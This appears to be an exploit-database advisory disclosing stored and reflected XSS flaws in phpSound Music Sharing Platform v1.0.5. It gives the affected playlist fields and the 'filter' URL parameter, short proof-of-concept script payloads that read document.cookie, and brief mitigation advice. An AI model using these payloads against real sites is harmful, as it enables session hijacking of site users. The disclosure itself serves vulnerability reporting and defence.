header-logo
Suggest Exploit
vendor:
Music Sharing Platform
by:
Halil Dalabasmaz
5.5
CVSS
MEDIUM
Stored XSS, Reflected XSS
79
CWE
Product Name: Music Sharing Platform
Affected Version From: v1.0.5
Affected Version To: v1.0.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2014

phpSound Music Sharing Platform Multiple XSS Vulnerabilities

Multiple XSS vulnerabilities exist in the phpSound Music Sharing Platform. The first vulnerability allows an attacker to execute arbitrary code by injecting a malicious payload in the 'Title' or 'Description' input fields of a playlist. The second vulnerability is a reflected XSS vulnerability in the 'filter' parameter of the explore page, allowing an attacker to execute arbitrary code. Sample payloads for both vulnerabilities are provided.

Mitigation:

To mitigate these vulnerabilities, the input fields should be properly filtered to prevent XSS attacks. Additionally, the 'filter' parameter should be filtered to prevent reflected XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: phpSound Music Sharing Platform Multiple XSS Vulnerabilities
# Date: 08-10-2014
# Exploit Author: Halil Dalabasmaz
# Version: v1.0.5
# Vendor Link: http://codecanyon.net/item/phpsound-music-sharing-platform/9016117
# Software Test Link: http://phpsound.com/demo

# Vulnerabilities Description:

===Stored XSS===
Create a Playlist and then you can run any XSS payload on "Title" or "Description" input fields.

Sample Payload for Stored XSS: "><script>alert(document.cookie);</script>

Solution
Filter the input fields aganist to XSS attacks.

===

===Reflected XSS===

The URL parameter is "filter" not filtered. 

http://server/path/index.php?a=explore&filter=XSS

Sample Payload for XSS: </title><script>alert(document.cookie);</script>

Solution
Filter the parameter aganist to XSS attacks.
===